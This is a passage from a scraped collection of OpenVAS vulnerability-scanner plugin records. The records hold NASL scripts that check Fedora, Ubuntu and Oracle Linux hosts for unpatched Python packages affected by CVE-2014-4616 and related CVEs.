"OPENVAS:1361412562310867929", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867929", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2014-7800\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867929\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-01 15:22:41 +0530 (Tue, 01 Jul 2014)\");\n script_cve_id(\"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for python FEDORA-2014-7800\");\n script_tag(name:\"affected\", value:\"python on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7800\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134903.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~13.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-07-21T00:00:00", "type": "openvas", "title": "Fedora Update for python FEDORA-2014-7772", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867987", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867987", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2014-7772\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867987\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-21 14:23:39 +0530 (Mon, 21 Jul 2014)\");\n script_cve_id(\"CVE-2014-4616\", \"CVE-2013-4238\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for python FEDORA-2014-7772\");\n script_tag(name:\"affected\", value:\"python on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7772\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135433.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~13.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-03-03T20:57:20", "description": "Check the version of python3", "cvss3": {}, "published": "2014-11-10T00:00:00", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2014-14245", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2020-03-02T00:00:00", "id": "OPENVAS:1361412562310868464", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868464", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-14245\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868464\");\n script_version(\"2020-03-02T07:51:06+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-02 07:51:06 +0000 (Mon, 02 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-10 05:10:57 +0100 (Mon, 10 Nov 2014)\");\n script_cve_id(\"CVE-2014-4650\", \"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python3 FEDORA-2014-14245\");\n script_tag(name:\"summary\", value:\"Check the version of python3\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-14245\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/142831.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~18.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-07-21T00:00:00", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2014-8035", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867978", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867978", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-8035\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867978\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-21 12:28:02 +0530 (Mon, 21 Jul 2014)\");\n script_cve_id(\"CVE-2014-4616\", \"CVE-2013-4238\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for python3 FEDORA-2014-8035\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-8035\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135423.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python3'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~9.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-03-03T20:57:02", "description": "Check the version of python3", "cvss3": {}, "published": "2014-11-14T00:00:00", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2014-14257", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4238", "CVE-2014-4616", "CVE-2014-4650"], "modified": "2020-03-02T00:00:00", "id": "OPENVAS:1361412562310868482", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868482", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-14257\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868482\");\n script_version(\"2020-03-02T07:51:06+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-02 07:51:06 +0000 (Mon, 02 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-14 06:45:26 +0100 (Fri, 14 Nov 2014)\");\n script_cve_id(\"CVE-2014-4650\", \"CVE-2013-4238\", \"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python3 FEDORA-2014-14257\");\n script_tag(name:\"summary\", value:\"Check the version of python3\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-14257\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143576.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~10.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:10", "description": "Oracle Linux Local Security Checks ELSA-2015-2101", "cvss3": {}, "published": "2015-11-24T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-2101", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122760", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122760", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-2101.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122760\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-11-24 10:17:32 +0200 (Tue, 24 Nov 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-2101\");\n script_tag(name:\"insight\", value:\"ELSA-2015-2101 - python security, bug fix, and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-2101\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-2101.html\");\n script_cve_id(\"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2013-1752\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-debug\", rpm:\"python-debug~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-test\", rpm:\"python-test~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-tools\", rpm:\"python-tools~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tkinter\", rpm:\"tkinter~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-06-26T00:00:00", "type": "openvas", "title": "Ubuntu Update for python2.7 USN-2653-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842261", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842261", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for python2.7 USN-2653-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842261\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-26 06:25:01 +0200 (Fri, 26 Jun 2015)\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\",\n \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for python2.7 USN-2653-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python2.7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that multiple Python\nprotocol libraries incorrectly limited certain data when connecting to servers.\nA malicious ftp, http, imap, nntp, pop or smtp server could use this issue to\ncause a denial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit unpacking\ngzip-compressed HTTP bodies. A malicious server could use this issue to\ncause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a certain\nargument. An attacker could possibly use this issue to read arbitrary\nmemory and expose sensitive information. This issue only affected Ubuntu\n12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled\nURL-encoded path separators in URLs. A remote attacker could use this issue\nto expose sensitive information, or possibly execute arbitrary code. This\nissue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in\nbuffer functions. An attacker could possibly use this issue to read\narbitrary memory and obtain sensitive information. This issue only affected\nUbuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185)\");\n script_tag(name:\"affected\", value:\"python2.7 on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2653-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2653-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.8-10ubuntu1.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.8-10ubuntu1.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4\", ver:\"3.4.2-1ubuntu0.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4-minimal\", ver:\"3.4.2-1ubuntu0.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.6-8ubuntu0.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.6-8ubuntu0.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4\", ver:\"3.4.0-2ubuntu1.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4-minimal\", ver:\"3.4.0-2ubuntu1.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.3-0ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.3-0ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2\", ver:\"3.2.3-0ubuntu3.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2-minimal\", ver:\"3.2.3-0ubuntu3.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:47", "description": "Oracle Linux Local Security Checks ELSA-2015-1064", "cvss3": {}, "published": "2016-02-05T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1064", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1753", "CVE-2014-1912", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:1361412562310122870", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122870", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1064.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122870\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-05 14:01:39 +0200 (Fri, 05 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1064\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1064\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1064.html\");\n script_cve_id(\"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2013-1752\", 